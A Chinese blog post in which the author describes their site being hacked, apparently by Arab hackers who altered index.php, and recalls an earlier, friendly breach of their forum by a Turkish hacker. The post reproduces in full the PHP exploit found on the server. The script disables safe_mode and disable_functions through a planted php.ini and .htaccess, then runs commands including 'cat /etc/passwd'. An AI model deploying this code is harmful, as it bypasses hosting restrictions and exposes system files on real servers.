我的博客被黑了。。貌似阿拉伯人干的。
阿拉伯黑客恨美国，我恰好是美国空间的中国用户。
前有河蟹，后有黑客，博客不好开啊。

这不是第一次遭遇黑客了。上一次是论坛的一个漏洞被土耳其黑客发现了。
他跟我开了个玩笑，然后告诉我这个漏洞是如何被他利用的，然后告诉我修正的办法。
后来我们在MSN成了朋友。原来这哥们当时车祸初愈。还有间歇性失忆的后遗症。
黑掉我的论坛，纯属巧合。。。是个可爱的家伙

这次的阿拉伯黑客，我很讨厌，好在他们没有做什么破坏，只是修改了index.php文件

apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit  这次攻击的漏洞
Author : Mr.SaFa7  作者的ID
Home : v4-team.com  黑客组织的网站全是阿拉伯文
note : this exploit for education :)   攻击的目的，看来是练习

上传到服务器用于攻击的代码，貌似利用了php safe mode的某个漏洞
这个文件是如何上传的服务器的，还不知道。很关键的问题
 

<?
echo “[+] Start…\n”;
$bypfile=fopen(‘php.ini’,'w+’);
$stuffile=fopen(‘.htaccess’,'w+’);
if($bypfile and $stuffile!= NULL){
echo “[+] evil files created succes ! \n”;
}
else{
echo “[-] access denial ! \n”;
}
$byprullz1=”safe_mode = OFF
“;
$byprullz2=”disable_functions = NONE”;
$dj=fwrite($bypfile,$byprullz1);
$dj1=fwrite($bypfile,$byprullz2);
fclose($bypfile);
if($dj and $dj1!= NULL){
echo “[+] php.ini writed \n”;
}
else{
echo “[-] 404 php.ini not found !\n”;
}
$breakrullz=”suPHP_ConfigPath /home/user/public_html/php.ini”; // replace this ‘/home/user/public_html’ by ur path
$sf7=fwrite($stuffile,$breakrullz);
fclose($stuffile);
if($sf7!= NULL){
echo “[+] evil .htaccess writed\n”;
echo “[+] exploited by success!\n\n\n”;
echo “\t\t\t[+] discouvred by Mr.SaFa7\n”;
echo “\t\t\t[+] home : v4-team.com\n”;
echo “\t\t\t[+] Greetz : djekmani4ever ghost hacker Str0ke ShAfEKo4EvEr Mr.Mn7oS\n”;
}
else{
echo “[-] evil .htaccess Not found!\n”;
}
system(“pwd;ls -lia;uname -a;cat /etc/passwd”);
#EOF
?>

没有相关文章